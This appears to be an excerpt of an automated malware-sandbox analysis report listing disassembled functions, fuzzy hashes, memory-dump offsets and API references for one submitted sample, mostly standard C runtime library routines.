Function 00A48E93 Relevance: .2, Instructions: 181COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2660197534.00000000009AC000.00000040.00000001.01000000.00000003.sdmp, Offset: 009AC000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9ac000_BEd2lJRXFM.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8f395882b0c1802733163b097ff49e366b9cc786d07f79bb2811b4058777cdbf
Instruction ID: e40332ac42d6382d1532bc618f386d59b5700f1d6b8faabe223785b5aec348ab
Opcode Fuzzy Hash: 8f395882b0c1802733163b097ff49e366b9cc786d07f79bb2811b4058777cdbf
Instruction Fuzzy Hash: 0551F1F660C600DFD308AE28E98567FB7F5EBD4720F26492EE2C687700DA355C449653

Function 008739CC Relevance: .2, Instructions: 170COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2660197534.0000000000819000.00000040.00000001.01000000.00000003.sdmp, Offset: 00819000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_819000_BEd2lJRXFM.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5d258d96cc4fbd6e1a3ad43d018b185bb4bf1f808a40b5267f30bff1bea1efd7
Instruction ID: 3ec30619754c3601b15b5b44b5ed074c1d9ce3727c71afef994135906b18c4ae
Opcode Fuzzy Hash: 5d258d96cc4fbd6e1a3ad43d018b185bb4bf1f808a40b5267f30bff1bea1efd7
Instruction Fuzzy Hash: CF517AB3F1053547F3144A78CC94362B6929B95310F2F82788E4CBBBC5E97E6C4A96C0

Function 008E16F0 Relevance: .2, Instructions: 150COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2660197534.0000000000819000.00000040.00000001.01000000.00000003.sdmp, Offset: 00819000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_819000_BEd2lJRXFM.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1395cfb521a2b0e9648e1cf1f78afb1f0166e41a7d9735d8a0b6d3cc7fe27e64
Instruction ID: f2b3315ad154ce665e7ac66a10c6f64a9acf11470591d3826e09db34ff5b0f6a
Opcode Fuzzy Hash: 1395cfb521a2b0e9648e1cf1f78afb1f0166e41a7d9735d8a0b6d3cc7fe27e64
Instruction Fuzzy Hash: 154159F361C2086FF348AE69EC917BAB7C9D784320F16463DEB85D7380E97A98054255

Function 04D08DB3 Relevance: .1, Instructions: 144COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000003.1995658163.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, Offset: 04D00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_3_4d00000_BEd2lJRXFM.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 752c4a2c8d500711185399bf2f6f55f818018c6fd5b69fec1d7075e323bfd424
Instruction ID: 40fe8d2f2802a6d0fffbf8f95fb230338000eb59b8f9562c2479200dd010c992
Opcode Fuzzy Hash: 752c4a2c8d500711185399bf2f6f55f818018c6fd5b69fec1d7075e323bfd424
Instruction Fuzzy Hash: 80519AB1E003058FEB24DF68D9817AABBF1FB48314F64842AE805EB394D379E951CB55

Function 04D19912 Relevance: .1, Instructions: 104COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000003.1995658163.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, Offset: 04D00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_3_4d00000_BEd2lJRXFM.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 70aa1c128304840ff80c1a6881110ca736e5edb3ee9a18fd8b7b5cd90a907d72
Instruction ID: 2b6ebc066a265f389a770a4fa731f2276b5889bab81cc58d1030c46ab4bd2f6d
Opcode Fuzzy Hash: 70aa1c128304840ff80c1a6881110ca736e5edb3ee9a18fd8b7b5cd90a907d72
Instruction Fuzzy Hash: A921B373F204394B7B0CC57ECC522BDB6E1C78C601745823AE8A6EA2C1D96CD917E2E4

Function 00AB7486 Relevance: .1, Instructions: 104COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2660197534.0000000000AB3000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AB3000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ab3000_BEd2lJRXFM.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e5f0ef5cdee173c45ba409c6f107ca30303cc4637a31a86d9151212d2ab6faff
Instruction ID: c59b431dc1b48575c2f49b334c42a6b15da8cd397d97028f4c84d60019dc771f
Opcode Fuzzy Hash: e5f0ef5cdee173c45ba409c6f107ca30303cc4637a31a86d9151212d2ab6faff
Instruction Fuzzy Hash: C7311CB260C600EFE7056F19D88167EFBF5EFD4720F16882DE2C583610E63594548B97

Function 04B6A779 Relevance: .1, Instructions: 104COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2662270643.0000000004B50000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4b50000_BEd2lJRXFM.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 70aa1c128304840ff80c1a6881110ca736e5edb3ee9a18fd8b7b5cd90a907d72
Instruction ID: 7b26a12b688a7df3586c59b2aacaa31c0e852f1e34bf51a9b5facb1fadf39d9a
Opcode Fuzzy Hash: 70aa1c128304840ff80c1a6881110ca736e5edb3ee9a18fd8b7b5cd90a907d72
Instruction Fuzzy Hash: 4321B373F205394B7B0CC57E8C522BDB6E1C78C601745823AE8A6EA2C1D96CD917E2E4

Function 0041A512 Relevance: .1, Instructions: 104COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2659964109.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2659964109.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_BEd2lJRXFM.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 70aa1c128304840ff80c1a6881110ca736e5edb3ee9a18fd8b7b5cd90a907d72
Instruction ID: 1ad9d6d7365e600a7bb69782b0834f4d420f3f91d9e0c3ac1aa475b9fcfe298e
Opcode Fuzzy Hash: 70aa1c128304840ff80c1a6881110ca736e5edb3ee9a18fd8b7b5cd90a907d72
Instruction Fuzzy Hash: 6521B673F2043947770CC57ECC522BDB6E1C78C501745423AE8A6EA2C1D96CD917E2E4

Function 04D197F2 Relevance: .1, Instructions: 81COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000003.1995658163.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, Offset: 04D00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_3_4d00000_BEd2lJRXFM.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a72ccc6e8b489e63011b81e3a8a50db20cbc6dad3c7a88df22060b293fe79ba1
Instruction ID: ea619eafe0a27f5ca5ddc790878c589a55d8ff86897b665d6ab358ac8b72fced
Opcode Fuzzy Hash: a72ccc6e8b489e63011b81e3a8a50db20cbc6dad3c7a88df22060b293fe79ba1
Instruction Fuzzy Hash: 7511A363F30C256B775C816D8C132BAA1D2EBD815030F433AD826E7284E8A4EE23D290

Function 04B6A659 Relevance: .1, Instructions: 81COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2662270643.0000000004B50000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4b50000_BEd2lJRXFM.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a72ccc6e8b489e63011b81e3a8a50db20cbc6dad3c7a88df22060b293fe79ba1
Instruction ID: f705b060c1f6f5262c094593700d2cd48994f03d532b45409b7b1955c26ffa67
Opcode Fuzzy Hash: a72ccc6e8b489e63011b81e3a8a50db20cbc6dad3c7a88df22060b293fe79ba1
Instruction Fuzzy Hash: 1111A723F30C255B675C81698C1327AA1D2DBDC14030F433AD827E7284E894DE23D290

Function 0041A3F2 Relevance: .1, Instructions: 81COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2659964109.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2659964109.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_BEd2lJRXFM.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a72ccc6e8b489e63011b81e3a8a50db20cbc6dad3c7a88df22060b293fe79ba1
Instruction ID: f1e66852e6b8581706c01849561528f719d4aeccf6fe4fc0aff0fb2656777429
Opcode Fuzzy Hash: a72ccc6e8b489e63011b81e3a8a50db20cbc6dad3c7a88df22060b293fe79ba1
Instruction Fuzzy Hash: D6118A73F30C255B675C816D8C172BAA5D2EBDC25074F533AD826E7284E998DE23D290

Function 04D09D60 Relevance: .1, Instructions: 76COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000003.1995658163.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, Offset: 04D00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_3_4d00000_BEd2lJRXFM.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
Instruction ID: b428dd742158c75bbf7b1438f5768eb5620e00cab4fc8cde85d728e48ff9894c
Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
Instruction Fuzzy Hash: CA11E9F728104283D6048A2ED4B47F7A795FBC532172CC2E6D0414B7DED222F1459510

Function 100102A0 Relevance: .1, Instructions: 76COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2663377241.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.2663360620.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2663397984.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2663415444.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_BEd2lJRXFM.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
Instruction ID: 6858cf0c51ff5caabfc3a7f957f7e97cc4d55c404d013567cdc706fa4bfc5bf2
Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
Instruction Fuzzy Hash: 5111087774118243D681C56DC4F86ABA3DEFBC52A0729436AF0D28FA58D2F2DAC5A600

Function 04B5ABC7 Relevance: .1, Instructions: 76COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2662270643.0000000004B50000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4b50000_BEd2lJRXFM.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
Instruction ID: 167435ee977a7fbd445ba0559425f01829aa2938fa114d453fb5a653692ef81a
Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
Instruction Fuzzy Hash: 5D110477240141439715CA2DDDB43BAE7B5EFCE320B2C47EAD9826B778D222F5459600

Function 0040A960 Relevance: .1, Instructions: 76COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2659964109.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2659964109.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_BEd2lJRXFM.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
Instruction ID: bf3d62387290270b8e9c206f9b330aa6ec5fad9da35dacc9460757c01b80fc97
Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
Instruction Fuzzy Hash: 43115EF730038143D704862EC5B45B7E395EBC6321B2F4B7BC0825B7C8C23A9865E50A

Function 00E09CCB Relevance: .1, Instructions: 61COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2661142428.0000000000E09000.00000040.00000020.00020000.00000000.sdmp, Offset: 00E09000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e09000_BEd2lJRXFM.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
Instruction ID: fd441b2444c18b403c4b0254fc61f98d14ddd68706d7747eab5859713957c9b8
Opcode Fuzzy Hash: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
Instruction Fuzzy Hash: 61117C72380100AFDB44DE65DCC1FA673EAEB88360B298065ED08DB357D675E841C760

Function 04B50D90 Relevance: .0, Instructions: 43COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2662270643.0000000004B50000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4b50000_BEd2lJRXFM.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
Instruction ID: a9a372e72a0caa430201dbf1f27ff0e92a8f4d5767ac8951d198d37f9d6f0fe4
Opcode Fuzzy Hash: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
Instruction Fuzzy Hash: 3001A276A006048FDF21EF24C814BAAB3E5EBC6316F5548E5ED0A9B291E774B9418F90

Function 04D12A6F Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000003.1995658163.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, Offset: 04D00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_3_4d00000_BEd2lJRXFM.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 938b1ef97d91fa147a56b9632c6ce73ee018995428c08987881a566186e623af
Instruction ID: 5f822c91a7d1eed5ed7e692976c2dc01ccd029a344349e200541729f9320635f
Opcode Fuzzy Hash: 938b1ef97d91fa147a56b9632c6ce73ee018995428c08987881a566186e623af
Instruction Fuzzy Hash: 86E08C32A11238FBCB24DB9DD90498AF3ECEB48B00B114496BA01E3120C270EE00C7E0

Function 10007A76 Relevance: .0, Instructions: 22COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2663377241.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.2663360620.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2663397984.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2663415444.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_BEd2lJRXFM.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 225e9490ce15994035050fff8e8d94bbe50aeb352c3921d505d22bbc77bda227
Instruction ID: 49573a245b17cd2143a7f0a663dc82b9d5ba07e6c12e429f55ccbb336c262c76
Opcode Fuzzy Hash: 225e9490ce15994035050fff8e8d94bbe50aeb352c3921d505d22bbc77bda227
Instruction Fuzzy Hash: CEE08C32E11228EBCB10CB88C940E8AB3ECFB86A80F114096B505E3101D274DF00C7C2

Function 04B638D6 Relevance: .0, Instructions: 22COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2662270643.0000000004B50000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4b50000_BEd2lJRXFM.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 938b1ef97d91fa147a56b9632c6ce73ee018995428c08987881a566186e623af
Instruction ID: 3adf2e35d5b9c0a310d9754d6c6fb1823ddebb16a07c1d5795a84cded8ca527e
Opcode Fuzzy Hash: 938b1ef97d91fa147a56b9632c6ce73ee018995428c08987881a566186e623af
Instruction Fuzzy Hash: 93E08C72911228EBCB24DB8CC905D8AF3FCEB44B40B11849AF906D3140C274EE00CBD0

Function 0041366F Relevance: .0, Instructions: 22COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2659964109.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2659964109.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_BEd2lJRXFM.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 938b1ef97d91fa147a56b9632c6ce73ee018995428c08987881a566186e623af
Instruction ID: fd5c11342e53f5fd9e78528a8d63764efe72d1229905d7d1658511e5362cd08d
Opcode Fuzzy Hash: 938b1ef97d91fa147a56b9632c6ce73ee018995428c08987881a566186e623af
Instruction Fuzzy Hash: EEE04632911228EBCB24DF898A08A8AF3ACEB44B09B11049AB501D3210C274DE80C7D4

Function 04D0E30D Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000003.1995658163.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, Offset: 04D00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_3_4d00000_BEd2lJRXFM.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9253131997efead4d70db6443559b4166ab1d7f2f85f8f4b6bf8833fc8910a7c
Instruction ID: 41bb5cc4d6447e106e878c6cb919990a1a825ea81fe59227b209d481c95240f8
Opcode Fuzzy Hash: 9253131997efead4d70db6443559b4166ab1d7f2f85f8f4b6bf8833fc8910a7c
Instruction Fuzzy Hash: 8AE04671500108BFCF11BF24DC48A8A3F28FB00242B008824F80997132CB35ED82CA64

Function 00409088 Relevance: 21.1, APIs: 8, Strings: 4, Instructions: 51libraryloaderCOMMON

Download Yara Rule

APIs

InitializeCriticalSectionAndSpinCount.KERNEL32(0042AF64,00000FA0,?,?,00409066), ref: 00409094
GetModuleHandleW.KERNEL32(api-ms-win-core-synch-l1-2-0.dll,?,?,00409066), ref: 0040909F
GetModuleHandleW.KERNEL32(kernel32.dll,?,?,00409066), ref: 004090B0
GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 004090C2
GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 004090D0
CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,?,00409066), ref: 004090F3
RtlDeleteCriticalSection.NTDLL(0042AF64), ref: 0040910F
CloseHandle.KERNEL32(00000000,?,?,00409066), ref: 0040911F

Strings

WakeAllConditionVariable, xrefs: 004090C8
kernel32.dll, xrefs: 004090AB
SleepConditionVariableCS, xrefs: 004090BC
api-ms-win-core-synch-l1-2-0.dll, xrefs: 0040909A

Memory Dump Source

Source File: 00000000.00000002.2659964109.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2659964109.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_BEd2lJRXFM.jbxd

Similarity

API ID: Handle$AddressCriticalModuleProcSection$CloseCountCreateDeleteEventInitializeSpin
String ID: SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
API String ID: 2565136772-3242537097
Opcode ID: f40741635cb42056a58b419ea30317dd48f67c6f9c1bd194eb93f888c376e813
Instruction ID: acc3deda13f420712ce33b53dd37b90dad73ad81c8ab949137041f64949c0d3f
Opcode Fuzzy Hash: f40741635cb42056a58b419ea30317dd48f67c6f9c1bd194eb93f888c376e813
Instruction Fuzzy Hash: 410196B1F40322ABE7202B75AD0DB963B989B4CB01B154036FD15E2295D77CCC01866D

Function 04D165E3 Relevance: 19.6, APIs: 13, Instructions: 113COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 04D1661C
___free_lconv_mon.LIBCMT ref: 04D16627

Part of subcall function 04D162E3: _free.LIBCMT ref: 04D16300
Part of subcall function 04D162E3: _free.LIBCMT ref: 04D16312
Part of subcall function 04D162E3: _free.LIBCMT ref: 04D16324
Part of subcall function 04D162E3: _free.LIBCMT ref: 04D16336
Part of subcall function 04D162E3: _free.LIBCMT ref: 04D16348
Part of subcall function 04D162E3: _free.LIBCMT ref: 04D1635A
Part of subcall function 04D162E3: _free.LIBCMT ref: 04D1636C
Part of subcall function 04D162E3: _free.LIBCMT ref: 04D1637E
Part of subcall function 04D162E3: _free.LIBCMT ref: 04D16390
Part of subcall function 04D162E3: _free.LIBCMT ref: 04D163A2
Part of subcall function 04D162E3: _free.LIBCMT ref: 04D163B4
Part of subcall function 04D162E3: _free.LIBCMT ref: 04D163C6
Part of subcall function 04D162E3: _free.LIBCMT ref: 04D163D8

_free.LIBCMT ref: 04D1663E
_free.LIBCMT ref: 04D16653
_free.LIBCMT ref: 04D1665E
_free.LIBCMT ref: 04D16680
_free.LIBCMT ref: 04D16693
_free.LIBCMT ref: 04D166A1
_free.LIBCMT ref: 04D166AC
_free.LIBCMT ref: 04D166E4
_free.LIBCMT ref: 04D166EB
_free.LIBCMT ref: 04D16708
_free.LIBCMT ref: 04D16720

Memory Dump Source

Source File: 00000000.00000003.1995658163.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, Offset: 04D00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_3_4d00000_BEd2lJRXFM.jbxd

Similarity

API ID: _free$___free_lconv_mon
String ID:
API String ID: 3658870901-0
Opcode ID: 618733a9981a7d7e15cd004ff7cd88c67c18ad7243d380dd4353b554986c4def
Instruction ID: ddfc5998a236cbf4f5f369fe881c9e97d09bf5e96e19da3b365bc0fe214b50e1
Opcode Fuzzy Hash: 618733a9981a7d7e15cd004ff7cd88c67c18ad7243d380dd4353b554986c4def
Instruction Fuzzy Hash: E2311731701200BBEB22AE79F984B5677E9FF00314F14886AE859D65B1DE75F890CB24

Function 04B6744A Relevance: 19.6, APIs: 13, Instructions: 113COMMONLIBRARYCODE

Download Yara Rule

APIs

___free_lconv_mon.LIBCMT ref: 04B6748E

Part of subcall function 04B6714A: _free.LIBCMT ref: 04B67167
Part of subcall function 04B6714A: _free.LIBCMT ref: 04B67179
Part of subcall function 04B6714A: _free.LIBCMT ref: 04B6718B
Part of subcall function 04B6714A: _free.LIBCMT ref: 04B6719D
Part of subcall function 04B6714A: _free.LIBCMT ref: 04B671AF
Part of subcall function 04B6714A: _free.LIBCMT ref: 04B671C1
Part of subcall function 04B6714A: _free.LIBCMT ref: 04B671D3
Part of subcall function 04B6714A: _free.LIBCMT ref: 04B671E5
Part of subcall function 04B6714A: _free.LIBCMT ref: 04B671F7
Part of subcall function 04B6714A: _free.LIBCMT ref: 04B67209
Part of subcall function 04B6714A: _free.LIBCMT ref: 04B6721B
Part of subcall function 04B6714A: _free.LIBCMT ref: 04B6722D
Part of subcall function 04B6714A: _free.LIBCMT ref: 04B6723F

_free.LIBCMT ref: 04B67483

Part of subcall function 04B61D29: HeapFree.KERNEL32(00000000,00000000,?,04B672DB,?,00000000,?,?,?,04B67302,?,00000007,?,?,04B675E1,?), ref: 04B61D3F
Part of subcall function 04B61D29: GetLastError.KERNEL32(?,?,04B672DB,?,00000000,?,?,?,04B67302,?,00000007,?,?,04B675E1,?,?), ref: 04B61D51

_free.LIBCMT ref: 04B674A5
_free.LIBCMT ref: 04B674BA
_free.LIBCMT ref: 04B674C5
_free.LIBCMT ref: 04B674E7
_free.LIBCMT ref: 04B674FA
_free.LIBCMT ref: 04B67508
_free.LIBCMT ref: 04B67513
_free.LIBCMT ref: 04B6754B
_free.LIBCMT ref: 04B67552
_free.LIBCMT ref: 04B6756F
_free.LIBCMT ref: 04B67587

Memory Dump Source

Source File: 00000000.00000002.2662270643.0000000004B50000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4b50000_BEd2lJRXFM.jbxd

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast___free_lconv_mon
String ID:
API String ID: 161543041-0
Opcode ID: 618733a9981a7d7e15cd004ff7cd88c67c18ad7243d380dd4353b554986c4def
Instruction ID: a49ac5cddb3af3ba052fe7e3f0a87cd181272b82a2030429cef212a0fe845d49
Opcode Fuzzy Hash: 618733a9981a7d7e15cd004ff7cd88c67c18ad7243d380dd4353b554986c4def
Instruction Fuzzy Hash: E6315E75600705AFEB25AA7CD848B5A77E9FF00318F1448DAE55AD7190DF38F9809B20

Function 004171E3 Relevance: 19.6, APIs: 13, Instructions: 113COMMONLIBRARYCODE

Download Yara Rule

APIs

___free_lconv_mon.LIBCMT ref: 00417227

Part of subcall function 00416EE3: _free.LIBCMT ref: 00416F00
Part of subcall function 00416EE3: _free.LIBCMT ref: 00416F12
Part of subcall function 00416EE3: _free.LIBCMT ref: 00416F24
Part of subcall function 00416EE3: _free.LIBCMT ref: 00416F36
Part of subcall function 00416EE3: _free.LIBCMT ref: 00416F48
Part of subcall function 00416EE3: _free.LIBCMT ref: 00416F5A
Part of subcall function 00416EE3: _free.LIBCMT ref: 00416F6C
Part of subcall function 00416EE3: _free.LIBCMT ref: 00416F7E
Part of subcall function 00416EE3: _free.LIBCMT ref: 00416F90
Part of subcall function 00416EE3: _free.LIBCMT ref: 00416FA2
Part of subcall function 00416EE3: _free.LIBCMT ref: 00416FB4
Part of subcall function 00416EE3: _free.LIBCMT ref: 00416FC6
Part of subcall function 00416EE3: _free.LIBCMT ref: 00416FD8

_free.LIBCMT ref: 0041721C

Part of subcall function 00411AC2: RtlFreeHeap.NTDLL(00000000,00000000,?,00417074,?,00000000,?,?,?,0041709B,?,00000007,?,?,0041737A,?), ref: 00411AD8
Part of subcall function 00411AC2: GetLastError.KERNEL32(?,?,00417074,?,00000000,?,?,?,0041709B,?,00000007,?,?,0041737A,?,?), ref: 00411AEA

_free.LIBCMT ref: 0041723E
_free.LIBCMT ref: 00417253
_free.LIBCMT ref: 0041725E
_free.LIBCMT ref: 00417280
_free.LIBCMT ref: 00417293
_free.LIBCMT ref: 004172A1
_free.LIBCMT ref: 004172AC
_free.LIBCMT ref: 004172E4
_free.LIBCMT ref: 004172EB
_free.LIBCMT ref: 00417308
_free.LIBCMT ref: 00417320

Memory Dump Source

Source File: 00000000.00000002.2659964109.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2659964109.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_BEd2lJRXFM.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast___free_lconv_mon
String ID:
API String ID: 161543041-0
Opcode ID: 78a1156ba884ffaad899c775ae10142786294d6101bc0a8744c53f5092b5fafb
Instruction ID: edf7faae9d3bf0885fb7c5c7e3fb72ef0fb286978f56b7ec46c8a8d77fdb3eda
Opcode Fuzzy Hash: 78a1156ba884ffaad899c775ae10142786294d6101bc0a8744c53f5092b5fafb
Instruction Fuzzy Hash: A1313D31608204ABEB21AB7AD845BD777F4AF41354F24885BF559D7261EE38ECC1C628

Function 04D0A4DB Relevance: 16.1, APIs: 6, Strings: 3, Instructions: 304COMMON

Download Yara Rule

APIs

IsInExceptionSpec.LIBVCRUNTIME ref: 04D0A5D8
type_info::operator==.LIBVCRUNTIME ref: 04D0A5FA
___TypeMatch.LIBVCRUNTIME ref: 04D0A709
IsInExceptionSpec.LIBVCRUNTIME ref: 04D0A7DB
_UnwindNestedFrames.LIBCMT ref: 04D0A85F
CallUnexpected.LIBVCRUNTIME ref: 04D0A87A

Strings

csm, xrefs: 04D0A518
csm, xrefs: 04D0A631
csm, xrefs: 04D0A585

Memory Dump Source

Source File: 00000000.00000003.1995658163.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, Offset: 04D00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_3_4d00000_BEd2lJRXFM.jbxd

Similarity

API ID: ExceptionSpec$CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
String ID: csm$csm$csm
API String ID: 2123188842-393685449
Opcode ID: 5cc99db94015cab6c404d32d320387b6f9b26d2efedfbed277260f256f17e541
Instruction ID: a7121a0e40d7e731409b6aaa985743287df470200f1f2564f25e72451b2831d3
Opcode Fuzzy Hash: 5cc99db94015cab6c404d32d320387b6f9b26d2efedfbed277260f256f17e541
Instruction Fuzzy Hash: 2CB18971900309EFDF29DFA4D980AAEBBB5FF64314B14C15AE8116B391D370EA51CBA1

Function 04B5B342 Relevance: 16.1, APIs: 6, Strings: 3, Instructions: 304COMMONLIBRARYCODE

